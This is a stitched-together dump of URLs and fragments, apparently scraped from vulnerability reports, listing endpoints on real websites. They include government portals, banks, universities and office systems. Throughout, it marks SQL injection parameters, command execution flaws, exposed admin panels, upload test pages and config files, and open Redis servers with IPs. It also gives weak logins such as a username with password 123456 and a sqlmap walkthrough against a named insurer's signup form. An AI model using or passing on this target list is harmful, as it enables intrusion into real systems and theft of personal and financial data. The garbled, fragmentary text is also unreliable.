http://115.29.148.82/adhome http://www.xz9d.com/?firstRow=16&totalRows=61&m=product&s=list&id=1014 http://www.xz9d.com/xz9dadminhh/index.php http://bspt.sdeic.gov.cn:8085 http://www.qt263.cn/index.php/Article/show/id/3485.html http://**.**.**/IPSysSIPO/Manager/login.aspx https://yizhenmoney.com:9003/esb/account/customer/bankInfo/list?customerId=14051005& http://140.207.169.83:8000/upload/attachment5/14033105/00150001/1432291395569.jpg https://yizhenmoney.com:9003/esb/fortune/customer/accountinfo?customerId=14087605& 
http://www.dznw.com/web/search_q.asp?title1=1 http://eoffice8.weaver.cn:8028/E-mobile/flowdo_page.php?diff=delete&RUN_ID=1 http://eoffice8.weaver.cn:8028/E-mobile/flowdo_page.php?diff=delete&flowid=1 http://eoffice8.weaver.cn:8028/E-mobile/flowsorce_page.php?flowid=2 http://eoffice8.weaver.cn:8028/E-mobile/flownext_page.php?diff=candeal&detailid=2,3 http://eoffice8.weaver.cn:8028/E-mobile/flowimage_page.php?FLOW_ID=2 http://eoffice8.weaver.cn:8028/E-mobile/flowform_page.php?FLOW_ID=2 http://eoffice8.weaver.cn:8028/E-mobile/diaryother_page.php?searchword=23 http://eoffice8.weaver.cn:8028/E-mobile/create/ajax_do.php?diff=word&sortid=1 http://eoffice8.weaver.cn:8028/E-mobile/create/ajax_do.php?diff=word&idstr=2 http://eoffice8.weaver.cn:8028/E-mobile/create/ajax_do.php?diff=addr&sortid=1 http://eoffice8.weaver.cn:8028/E-mobile/create/ajax_do.php?diff=addr&userdept=1 http://eoffice8.weaver.cn:8028/E-mobile/create/ajax_do.php?diff=addr&userpriv=1 http://eoffice8.weaver.cn:8028/E-mobile/create/ajax_do.php?diff=wordsearch&idstr=1 http://eoffice8.weaver.cn:8028/E-mobile/flow/flowhave_page.php?detailid=2,3 http://eoffice8.weaver.cn:8028/E-mobile/flow/flowtype_free.php?flowid=1 http://eoffice8.weaver.cn:8028/E-mobile/flow/flowtype_free.php?runid=1 http://eoffice8.weaver.cn:8028/E-mobile/flow/flowtype_other.php?flowid=1 http://eoffice8.weaver.cn:8028/E-mobile/flow/flowtype_other.php?runid=1 http://eoffice8.weaver.cn:8028/E-mobile/flow/freeflowimage_page.php?fromid=2 http://eoffice8.weaver.cn:8028/E-mobile/flow/freeflowimage_page.php?diff=new&runid=2 http://dev.gfan.com/ http://tongji.gfan.com/rest/partner.json/getByProduct/demo?platformid=1&productid=3021731 http://account.pcjoy.cn/authentication.html http://www.wooyun.org/bugs/wooyun-2010-0110374 http://www.wooyun.org/bugs/wooyun-2010-0104180 http://www.wooyun.org/bugs/wooyun-2010-093546 http://bspt.sdeic.gov.cn:8085 http://bspt.sdeic.gov.cn:8081/ http://team.epeaksport.com/ http://team.epeaksport.com/ 
http://app1.chinadaily.com.cn/bbs/survey.shtml?msg=&sid=67 http://www.zjtzgtj.gov.cn/e/tool/feedback/index.php?id=955&bid=2&ecms=view http://219.159.71.173/webjjindex/bus_detail.jsp?busno=0109参数busno http://219.159.71.173/webjjindex/addbustype_detail.jsp?procmode=PMUPDATE&sbusno=参数sbusno redis_version:2.8.8 redis_git_sha1:00000000 redis_build_id:cd783d97535ce235 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.7 process_id:29985 run_id:70b67921914bf3c55bd954ff5e79d634f6c9d1a9 tcp_port:6379 uptime_in_seconds:4601107 lru_clock:10472005 config_file:/data1/terma/soft/redis-2.8.8/redis.conf client_longest_output_list:351 used_memory:1123333864 used_memory_human:1.05G used_memory_rss:1301876736 used_memory_peak:1294390120 used_memory_peak_human:1.21G used_memory_lua:33792 mem_fragmentation_ratio:1.16 mem_allocator:jemalloc-3.2.0 rdb_changes_since_last_save:954666174 rdb_last_save_time:1431934258 total_connections_received:153786 total_commands_processed:2205822709 expired_keys:4276537 keyspace_hits:168305437 keyspace_misses:5798728 role:master repl_backlog_size:1048576 used_cpu_sys:15118.22 used_cpu_user:21074.41 used_cpu_sys_children:0.00 used_cpu_user_children:0.00 db0:keys=441514,expires=181413,avg_ttl=56425055 http://118.144.36.61/ http://www.iliangcang.com/i/ufindpwd/?act=send_email&email=XXX&uid=XXX http://61.140.99.122/face/login.jsp http://61.140.99.122:80/face/login_back.jsp?USERID=11111111 http://jiwei.cqupt.edu.cn/ http://www.casetc.ac.cn/show.asp?catid=426&id=901 http://www.casetc.ac.cn/show.asp?catid=426& http://www.sqzfgjj.com/Query_Sspersons.aspx www.sqzfgjj.com http://www.yongcheng.com/new/centerIndex http://www.polchina.com.cn/service/bank_coded_lock_0.php http://www.piao88.com http://www.piao88.com/member/ordermass/id/49830 http://www.piao88.com/member/ordermass/id/1 http://www.piao88.com/member/showupdate/id/6494 http://www.piao88.com/member/showupdate/id/1 http://show.sina.com.cn/ http://space.show.sina.com.cn/ 
http://space.show.sina.com.cn/bloglist.php?space_uid=218835112 http://wooyun.org/bugs/wooyun-2010-098586 http://login.sina.com.cn/sso/crossdomain.php?action=login http://passport.weibo.com/wbsso/login?ticket=********** http://m.mama.cn/ask/?g=Home&a=Common&d=checkBlackList&uid=1 http://116.113.17.138:8088/login.aspx http://218.2.130.246:8082/login.aspx http://121.10.6.92/Default.aspx http://www.wlm18.com:8180/login.jsp http://218.25.10.100/ http://www.tumen.gov.cn//upfile_photo.asp http://www.tumen.gov.cn/admin//FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.tumen.gov.cn/admin//FCKeditor/editor/filemanager/connectors/test.html http://www.tumen.gov.cn/news.asp?id=1202还有注人点 http://www.tthuishou.com/SearchOrder.aspx?mobile= http://www.ddxt.org/Index/loginHtml http://t.knowbox.cn/ModiPassword.aspx http://www.youxituoluo.com/member/add_project/list.php http://www.youxituoluo.com/phpMyAdmin/ http://tcm.iquanyou.com.cn/tcm/login.jsp http://59.151.39.85/pre/ http://59.151.39.85/pre/upload/default.htm http://59.151.39.85/pre/upload/sample1.htm http://59.151.39.85/pre/upload/wooyun.jpg http://59.151.39.85/pre/upload/01.jsp http://yiliao.kingdee.com/ http://www.mhealth100.com/ip-pat-mgr-web/!index.do http://xiaohua.dahe.cn/index.html http://xiaohua.dahe.cn/2015/07-11/105251837.html http://www.anquan.com.cn/index.php?m=member http://**.**.**.**:89/web/department/deptsave.php http://**.**.**.**/web/department/deptsave.php http://huashi.platform.nduoa.com/ http://ad.hz.letv.com/changanford24/php/gettextcontlist.php?memo=24节气&callback= http://ad.hz.letv.com/changanford24/php/gettextcontlist.php?memo=24节气&callback= http://sqlmap.org http://www.10010fj.cn/jsp/fa/login/faLogin.jsp redis_version:2.8.16 redis_git_sha1:00000000 redis_build_id:a645531b82b68834 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.7.2 process_id:27128 run_id:a0287f93eb2136e843405315ebf8556226ad7b14 tcp_port:6379 uptime_in_seconds:25579859 uptime_in_days:296 
lru_clock:10526253 config_file:/usr/local/etc/redis.conf http://www.517lppz.com/position2.php?id=-1 http://mo.gw.com.cn/iNewsDetailHtml.php?pageurl=http://127.0.0.1:22/ http://ma.apps.cctv.com/Enterprise/EnterpriseSearch.jsp http://ma.apps.cctv.com/cK/foot.jsp http://vip.gd10010.cn/vip/self/selfList.do http://112.96.28.190:8082/shop/admin/ordPrt!ordPrtList.do?user_id=DIANSHANG&out_tid=WCSV215042913412971656461&token=3266db4edfd82478a19972ddc30053f1 http://mojing.baofeng.com/ http://mojing.baofeng.com/admin/index/login http://www.sdnbyy.com/sfz/down/ xls:2156行信息 http://www.sdnbyy.com/uploadfile/ http://www.sdnbyy.com/admin/ http://www.qfkd.com.cn/city.aspx?wang=231&city=640&type=%E7%BD%91%E7%AB%99%E5%90%8D%E7%A7%B0&keywords=%E6%B5%99%E6%B1%9F http://www.qfkd.com.cn/city.aspx?wang=231&city=640&type=%E7%BD%91%E7%AB%99%E5%90%8D%E7%A7%B0&keywords=%E6%B5%99%E6%B1%9F http://www.88.com.cn:8090/admin/login www.88.com.cn:8090 http://www.88.com.cn:8090 http://bsy.7cha.com/weixin/index.php/Index/newsDetail.html?id=30 http://www.qhwjw.gov.cn:8001/infocenter/content.aspx?type=1&id=152参数id http://www.qhwjw.gov.cn:8001/MedicalGuide/guidechild.aspx?STATEID=300参数STATEID http://www.nduoa.com/ http://182.18.29.82:8080/login.html http://shbx.sxxhrss.gov.cn/sionline/notice.jsp?id= http://219.142.54.177/ http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000179591 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000013098 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000089815 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000014830 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000133596 
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/outbound&page=/confirmPrintB.do&orderId=041503-25671&status=4&subtoAgentId=000066034&SSMoney=0.00 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/outbound&page=/confirmPrintB.do&orderId=041503-7349&status=7&subtoAgentId=000066034&SSMoney=0.00 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/outbound&page=/confirmPrintB.do&orderId=071507-9225&status=7&subtoAgentId=000066034&SSMoney=0.00 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/orderTouristPrintB.do&orderId=041412-10452|000000137|000000137 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/orderTouristPrintB.do&orderId=041412-10451|000000137|000000137 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/orderTouristPrintB.do&orderId=041412-104548|000000137|000000137 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/saleList.do&orderId=071507-13461&companyId=GDGLGF&agentId=000000663 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/saleList.do&orderId=071507-12712&companyId=GDGLGF&agentId=000000663 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/saleList.do&orderId=071506-9296&companyId=GDGLGF&agentId=000000663 http://bjoa.avic-intl.cn/c6/Jhsoft.Web.login/PassWordNew.aspx http://bjoa.avic-intl.cn/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123 http://bjoa.avic-intl.cn/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123 www.xunzai.com User:xunzai@localhost Db:new_xunzai_disk http://dygzw.dyjr.gov.cn/ReadView.asp?id=1063 http://tonggao.baidu.com/ http://contest.24k.hk/share/detail.html?newsid=89,如图所示: http://contest.24k.hk/share/detail.html?newsid=89链接放入sqlmap检测当前用户和数据库,如图所示: http://www.hnpost.com/Uploadfile1.htm http://www.hnpost.com/UploadFace.asp http://www.hnpost.com/upme1.htm http://www.hnpost.com/upme2.htm http://www.hnpost.com/upme3.htm http://www.hnpost.com/upme4.htm 
http://www.hnpost.com/pic.html http://www.chinadegrees.cn/xwyyjsjyxx/zzgs/xw/zxzx/280579.shtml http://www.chinadegrees.cn/zzlk/clientStuBmk.shtml?action=doPrintStuQRS&user_bmbh=151201023220 http://libao.g.letv.com/?gid=116 http://sqlmap.org http://cvs.hexun.com/zhaopin/index.htm?area=&posttype= https://www.sukedai.com/meitibaodao/a4098.html http://www.kkkdai.com/hetong/31411614799/a266.html http://www.smjr365.com/hetong/11413440348/a236.html http://shunchangcaifu.com/hetong/11433902457/a266.html http://wenbangjinrong.com/hetong/20771431501740/a301.html http://www.zhuoxincf.com/hetong/11426320337/a361.html http://bccht.com/hetong/11426906332/a260.html http://www.lurongdai.com/hetong/11419819051/a230.html http://www.hengdacaifu.com/hetong/11424138394/a358.html http://www.zjnbcf.com/hetong/11434417762/a311.html http://www.smjr365.com/hetong/11413440478/a239.html https://www.fyjrw.com/hetong/171411698323/a365.html http://wangdai168.com/hetong/11415671635/a206.html http://www.xuefudai.com/hetong/11400834579/a193.html http://www.bccht.com/hetong/11427420975/a252.html http://www.btzhd.com/hetong/11418107944/a513.html http://www.mingfucaifu.com/hetong/a207.html http://www.donglingdai.com/hetong/11426081940/a280.html http://www.zndai.com/hetong/11422237766/a319.html http://www.qduoduo.net/hetong/20131422952463/a307.html http://www.xsbvc.com/hetong/11433815693/a251.html http://www.mingyedai.com/hetong/11423107497/a266.html http://yolo100.net/hetong/11433834019/a266.html http://www.btzhd.com/hetong/11406003017/a362.html http://ludongchuangtou.com/hetong/11422410934/a241.html http://xinruncaifu.com/hetong/11422087813/a235.html http://chengyuecaifu.com/hetong/11426987910/a240.html http://leyuancaifu.com/hetong/11423816917/a267.html http://zhuoxincf.com/hetong/11430876601/a437.html http://www.hengdacaifu.com/hetong/11435657481/a599.html http://fuhuajinrong.com/hetong/11433401169/a304.html http://donglingdai.com/hetong/6401432794278/a460.html 
http://bccht.com/hetong/2881435573730/a424.html http://qinghuacaifu.com/hetong/11434182603/a279.html http://zhengdaguquan.com/hetong/3181436084337/a416.html http://sdxpct.com/hetong/11429853648/a276.html http://miaomiaocaifu.com/hetong/11431170534/a656.html http://www.hongshuncaifu.com/hetong/11436172638/a232.html http://longmaocaifu.com/hetong/11430725945/a270.html http://www.91toufang.com/hetong/11435148183/a242.html http://www.yikuaict.com/hetong/4221436408356/a400.html http://www.jufuyidai.com/hetong/3711436410305/a349.html http://haohaochuangtou.com/hetong/11432368769/a273.html http://www.153mh.com/hetong/11380443494/a45.html http://wangdai168.com/hetong/11415843232/a207.html http://domain/hetong/数字/a数字.html http://app.iliangcang.com/.svn/entries http://www.yinzhengjinrong.com/edu/index.php?g=news&m=article&a=page&id=2205 http://www.yinzhengjinrong.com http://www.yinzhengtouzi.com/ http://**.**.**.**/admin/cars/CarManger.aspx http://**.**.**.**/admin/cars/CarManger.aspx http://**.**.**.**/admin/Teacher/TeachList.aspx http://**.**.**.**/admin/Teacher/TeachList.aspx http://**.**.**.**/admin/cars/CarManger.aspx http://**.**.**.**/admin/cars/CarManger.aspx http://jxkh.gtja.com/default/adviser http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.**/_ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.**/_ http://**.**.** http://**.**.**/_ http://**.**.** http://**.**.** http://**.**.** http://**.**.**/_ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.**/ http://**.**.**.**/ http://**.**.**.**:8081/ http://**.**.**.**/ http://**.**.**.**/ks/ http://**.**.**.**/ http://**.**.**.**/ 
http://**.**.**.**/ http://hui.vcyber.com/comm/showcomm?CommTypeID=1 http://self.uestc.edu.cn:8080 http://www.besttone.com.cn/ http://www.besttone.com.cn/wap/news_xiangqing.php?id=1 http://learningstg.ceair.com/ilearn/get_ila_user.action?user=12657448&Id=200294093&type=O&flag=V http://learningstg.ceair.com/ilearn/get_ila_user.action?user=12657444&Id=200294093&type=O&flag=V http://ady.oa5.meetok.com/handler/goodsearch/goodsearchhandler.ashx?BrandId=-1&method=searchcd&Price=0&Random=0.7027969195041806&TypeId=-1 http://oa.cr13g.com/c6/Jhsoft.Web.login/PassWord.aspx http://oa.cr13g.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123 http://oa.cr13g.com/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123 http://ilovebi.hiall.com.cn/1.php http://www.ganji.com/pub/pub.php?act=pub&cid=14&domain=gy&method=load http://www.znv.com.cn/sysadmin/Login.aspx http://oec.quanyou.com.cn/prelogin.do http://oa.misshachina.com/ http://oa.misshachina.com/common/update/201571123195238403.aspx http://**.**.**.**/ http://**.**.**.**/Teacher/TeacherPf.aspx?yid=0030 http://**.**.**.**/Teacher/TeacherPf.aspx?yid=0030 http://**.**.**.**/Teacher/TeacherPf.aspx?yid=0030 http://www.wz2sc.com/coms.php?com_title= http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**:8001/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**/workplate/ http://**.**.**.**:8001/workplate/ http://**.**.**.**/workplate/xzsp/kqgl/kqsz/kqsz.aspx http://**.**.**.**/workplate/xzsp/lbsxdict/add.aspx http://**.**.**.**/workplate/base/operation/add.aspx http://www.qhdzfcg.gov.cn/mylogon/product.do http://www.qhdzfcg.gov.cn/mylogon/product.do http://sqlmap.org http://webmail.now.net.cn//mobile/manager/conta http://sqlmap.org http://webmail.now.net.cn:80//mobile/index.php cn:8080 
http://web.abcde.cn/webmall/query.php?typeid=2%27 http://www.edutech.com.cn/news.do?method=produc http://sqlmap.org https://**.**.**/esb/account/customer/bankInfo/listcustomerId=14051005& http://**.**.**/upload/attachment5/14051005/00150001/1432363081128.jpg https://**.**.**/esb/account/customer/cardInfo/auditcustomerId=14051005& http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg http://**.**.**/upload/attachment5/14033105/00150001/1432291395569.jpg https://**.**.**/esb/fortune/customer/accountinfocustomerId=14087605& http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/Manage/quyu.aspx http://**.**.**.**/Manage/quyu2.aspx http://**.**.**.**/Manage/quyu_xq.aspx http://**.**.**.**/Manage/News_edit.aspx?id=1 http://**.**.**.**/Manage/News_edit.aspx?id=1 http://**.**.**.**/Manage/News_edit.aspx?id=1 http://**.**.**.**/Manage/News_edit.aspx?id=1 http://**.**.**.**//Manage/News_edit.aspx?id=1 http://www.gfan.com//plus/imageurl.php?p=http://www.apx88.com/webadmin/upload/pic_seckill/info.php%3f%2500.jpg http://wap.yantai.gov.cn http://wap.yantai.gov.cn/ggfw/index_wsms_show.jsp?id=245694 http://119.97.207.217/ http://**.**.**.**:808/admin/index.aspx http://**.**.**.**/admin/index.aspx http://**.**.**.**:81/admin/index.aspx http://**.**.**.**:82/admin/index.aspx http://**.**.**.**/admin/index.aspx http://eservice.95549.cn/eservice/account/register.action?action=initSingle,国华人寿注册用户处,随意输入某个注册用户,点击发送验证码,在手机验证码处随便填入6位数,提交抓包,第一个包是四位图片验证码的,第二个包存在sql注入,用burp抓到第二个包时是POST包,sqlmap跑不了,将此包复制改为GET包存起来,再用sqlmap跑,跑的时候要添加sqlmap的“between"脚本,参数mobile、phone_verification_code、operateType均存在注入,基于时间的sql注入,好慢啊。。。跑了两天,跑出表名共169个。。。 http://eservice.95549.cn/eservice/account/register.action?action=initSingle http://upload.justeasy.cn/ http://mail.hbaas.com/admin/ http://**.**.**.**:8001/paper/submit1.jsp http://**.**.**.**:8080/paper/submit1.jsp http://**.**.**.**:8001/paper/submit1.jsp 
http://219.143.162.218/htwx/ http://www.chinacses.org:8080/effort/index.action存在命令执行漏洞 http://www.cs12333.com/Online/ http://fotoplace.cc/admin/src/notify/notifies.php http://58.217.99.131:8080/lsxx/portal/index.action存在命令执行漏洞 http://www.tyread.com:8088/manhua/lianhuanhua-10000091550250/index.html?categoryId=10000091550250&type=2&channel=漫画 http://**.**.**.**:7001/netrep/index.jsp http://**.**.**.**:7010/netrep/index.jsp intitle:nClass教学平台 http://**.**.**.** http://passport.anta.cn/index.php?g=user&m=login&a=forgot_password http://homesecurity.haier.com/HaierAF/login4webapp/downLoadFile.action?filePath= http://homesecurity.haier.com/HaierAF/login4webapp/login.jsp http://221.179.180.156:9836/HttpApi_Simple/submitMessage http://love.17173.com/dnf http://love.17173.com/ajax/getajaxinfo.php?Work=getUserList&gameid=20011&curpg=1&pagesize=15&gameserver=27&gamebwork=4&gamebwork=4 site:3g.renren.com http://oa.ccib.com.cn/login.asp http://oa.ccib.com.cn/InforForWeb/list.asp?id=123 http://oa.ccib.com.cn/InforForWeb/list.asp http://yt.linekong.com/lottery/panda/vote_xml.php http://yt.linekong.com/ http://218.91.204.132:8080/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d= http://log.iddsms.com:80/ http://219.143.162.218/htwx http://219.143.162.218/htwx/common/easyQueryVer3/EasyQueryXML.jsp http://219.143.162.218/htwx/wxaccounts/WXFollowUserGift.jsp http://cailing.kongzhong.com/WEB-INF/classes/log4j.properties http://cailing.kongzhong.com/WEB-INF/web.xml http://cailing.kongzhong.com//WEB-INF/lib/context-datasource.xml http://219.143.118.86/ZYK/ http://mall.gd10010.cn/component_lib/user/login.do http://manage.gd10010.cn/wcsweb/sysLogin/toLogin.do http://www.huayubaoxian.com/policy/policymgr/taipingyang/edit.asp?policyid=2 http://www.huayubaoxian.com/policy/policymgr/taipingyang/edit.asp?policyid=1148153 IP:119.145.14.47:443 http://wap.zqgx.gov.cn/ckfinder1111/ckfinder.html https://code.csdn.net/dwzteam/dwz_springmvc/issues?closed=0&order= http://admin.tsz.gfan.com/login.php 
http://m.sinosig.com/mobile/claimreport/carinsurance/car_claim_report!index.action?WT.ac_id=GW_mobile_index_chexianbaoan&needWxShare=true http://219.142.78.170/etrading http://219.141.242.66/htwx/login# http://219.141.242.66/console http://222.85.90.57 http://www.cmccwlan.cn:8006/Manager/Login.aspx www.cmccwlan.cn:8002 http://www.cmccwlan.cn:8002 http://m.haoinvest.com/#user_zhpasst bj.mangocity.com/visa/detail.jsp?visa_basic_info_id=33, http://www.coolpad.com/ http://**.**.**.**/bugs/wooyun-2010-068192 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ www.mangocity.com/index.php/order/order_controller/index index.php/order/order_controller/index http://www.mangocity.com:80/ www.mangocity.com http://shanghai.dianwoba.com/auth/reset_password_01.do site:tf56.com,可获取统一portal入口,如下所示: http://ec.yto.net.cn http://www.cpeinet.com.cn/cpcec/cert/cert_apply_print.jsp?id=15324 http://www.cpeinet.com.cn/cpcec/cert/cert_apply_print.jsp?id=15325 http://**.**.**.**/content.jsp?id=40283c92483458240148346c4f2b0099 http://**.**.**.**/pagelist.jsp?id=40283c924762439001476611aca101fa http://**.**.**.**/pagelist.jsp?id=8a12c19446cbcb6f0146cbdc38550070 http://**.**.**.**/content.jsp?id=8a12c19449ca9e9e014c08116f7616e9 http://**.**.**.**/template/ykz/pagelist.jsp?id=4028813d3fa260f9013fa28ccf62071d http://**.**.**.**/template/ykz/content.jsp?id=4028800641d87b090141e4c5a7e76f44 http://**.**.**.**/pagelist.jsp?id=8a12c19445fd5c5f0146028d63840441 http://**.**.**.**/content.jsp?id=8a12c194482f585901483fc4640f0806 http://**.**.**.**/pagelist.jsp?id=8a12c194468d8ebb0146a2347d881052 http://**.**.**.**/content.jsp?id=8a12c1944c73cd10014cbc1de8290567 http://**.**.**.**/content.jsp?id=297e9e79491710d201491c1229280320 http://**.**.**.**/pageList.jsp?id=4028813e48a1e37a0148a586dc8f00fe http://**.**.**.**/content.jsp?id=40283c924dae0cfb014dc32dbaaa0c16 http://**.**.**.**/pageList.jsp?id=4028813e48a1e37a0148a586dc8f00fe 
http://115.182.66.150:8082/弱口令一枚,admin https://www.baidu.com/s?ie=UTF-8&wd=inurl%3Ahttp%3A//www.happytoo.cn/seller.line.confirm.html%3Foid= http://www.happytoo.cn/seller.line.confirm.html?oid=549821&mid=148885&cid=19679 http://www.happytoo.cn/seller.line.confirm.html?oid=549445&mid=148885&cid=19679 http://www.happytoo.cn/seller.line.confirm.html?oid=12035&mid=148885&cid=19679 http://www.happytoo.cn/seller.line.confirm.html?oid=688979&mid=148885&cid=19679 www.happytoo.cn http://www4.shaanxi.gov.cn/manager/login.aspx http://119.191.58.179:8090/login.jsp http://app.shzj.gov.cn:443/wzhd/jyjczh/jyjcxx/jdc_xx.jsp?id=12 http://app.shzj.gov.cn:443/wzhd/jyjczh/jyjcxx/jdc_xx.jsp?id=12 http://www.wulanchabu.gov.cn:80/2015/qlqd/ajax.jsp?deptid=%E5%A6%87%E8%81%94&pageSize=12 http://219.226.132.31/zhxt_bks/zhxt_bks.html华北电力科技大学 http://222.194.15.1:7777/zhxt_bks/zhxt_bks.html哈工大威海校区 http://web2.tust.edu.cn:7777/zhxt_bks/zhxt_bks.html http://jwweb.yzu.edu.cn:7777/zhxt_bks/zhxt_bks.html http://202.114.224.81:7777/zhxt_bks/zhxt_bks.html http://211.64.120.50/zhxt_bks/zhxt_bks.html http://210.44.2.167:7777/zhxt_bks/zhxt_bks.html http://jwxt.whcm.edu.cn:8000/zhxt_bks/zhxt_bks.html http://202.113.80.18:7777/zhxt_bks/zhxt_bks.html http://202.207.177.15:7777/zhxt_bks/zhxt_bks.html http://jwweb.yzu.edu.cn:7777/zhxt_bks/zhxt_bks.html jwcweb.lcu.edu.cn/zhxt_bks/zhxt_bks.html聊城大学 jwgl.lnu.edu.cn/zhxt_bks/zhxt_bks.html辽宁大学 http://xuanke.hebut.edu.cn:7777/zhxt_bks/zhxt_bks.html http://202.199.184.40/zhxt_bks/zhxt_bks1.html东北大学 http://202.100.210.140:800/zhxt_bks/zhxt_bks.html海南职业技术学院 http://202.114.224.81:7777/zhxt_bks/zhxt_bks.html http://202.114.224.81:7777/pls/wwwbks/qcb.table_browse?ctable=all_tables&ntable_type=1&ccolumns=*&cclauses=&nrow_min=1&nrow_max=150 http://m.daojia.com.cn/list.php?area=1 http://2013.csztv.cn/event/host/admin/homecon/fenlei index.php/game/searchgame/ http://4007787878.com.cn/Site/FindPassword http://sie.whu.edu.cn/admin.php?s=/public/login.html 
http://www.gfortune.com.tw:80/ www.gfortune.com.tw http://szts.huatu.com/goods.php?id=5869 http://today.itjuzi.com/product/comment http://today.itjuzi.com/product/subscriber http://today.itjuzi.com/product/zan www.suning.com http://shopping.suning.com/bindCard.do http://www.gtcz.gov.cn/index.php?m=vote&c=index&a=post&subjectid=4&siteid=1 http://202.108.65.139:8080/ http://**.**.**.**/bugs/wooyun-2015-0109795 http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**//sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://**.**.**.**/sysTemplateWeb/Search.aspx?XXDM=&CatalogId=1101&searchtype=EventYears&year= http://183.63.223.82:8080/_pub/gp.jsp?id=545&clsid=G http://60.216.99.136:8810/abc.rar http://dsx.scfai.edu.cn/showinfo2.asp?id=768 http://vod.czgd.cn/player.php?id=10362 http://vod.czgd.cn/memcp.php?action=template_list&id=1 http://vod.czgd.cn/home.php?action=article&id=6 http://218.245.6.116/ http://218.245.6.116/cK/foot.jsp http://www.iliangcang.com/i/ufindpwd/ http://www.sioc-ccbg.ac.cn/tripos/?p=1&a=view&r=206 http://campus.coolpad.com/ http://campus.coolpad.com http://114.80.137.36:8080/,可以看到如下信息。 
http://comment.ali213.net/xianshi/pl_xianshi.php?bb=news&id=9 inurl:http://cdcgs.changde.gov.cn/module/ http://cdcgs.changde.gov.cn/module/download/downfile.jsp?classid=0&filename=1312101442116539219.xls http://cdcgs.changde.gov.cn/module/download/downfile.jsp?classid=0&filename=1404101019423379596.xls http://115.182.66.150:8161/admin/index.jsp http://115.182.66.150:8161/hawtio/ http://i.ziroom.com/?uri=contract/seeContract&contract_code=BJCW81506230201 http://**.**.**.**/bugs/wooyun-2015-090966 IP:118.192.93.132 Port:6379 IP:118.192.93.122 Port:6379 IP:118.192.93.113 Port:6379 IP:118.192.93.123 Port:6379 IP:118.192.93.127 Port:6379 IP:118.192.93.236 Port:6379 http://login.jzjt.com/login.jsp http://login.jzjt.com/login.jsp?R1.x=25&R1.y=25&passwd=a&refer=%2Femail.jsp&userid=a* http://dmoa.cofco.com/seeyon/index.jsp,用猪猪侠常用用户名和弱口令123456可获得不少有效账号,登陆后可查看协同工作、公文管理、公共信息、个人事务等,尤其是可查看通讯录,里面包括中粮全公司人员的联系方式。 http://campus.coolpad.com/ http://campus.coolpad.com http://idea.cofco.com/,中粮创意收集管理系统,用户名lxia和弱密码123456可进行登陆。 http://idea.cofco.com/?m=News&a=newsdetails&news_id=118、 http://idea.cofco.com/?m=News&a=activity&news_id=108、http://idea.cofco.com/index.php/Idea_plat/idea_details/id/92484/inde,前两个news_id存在注入,后一个存在伪静态注入。 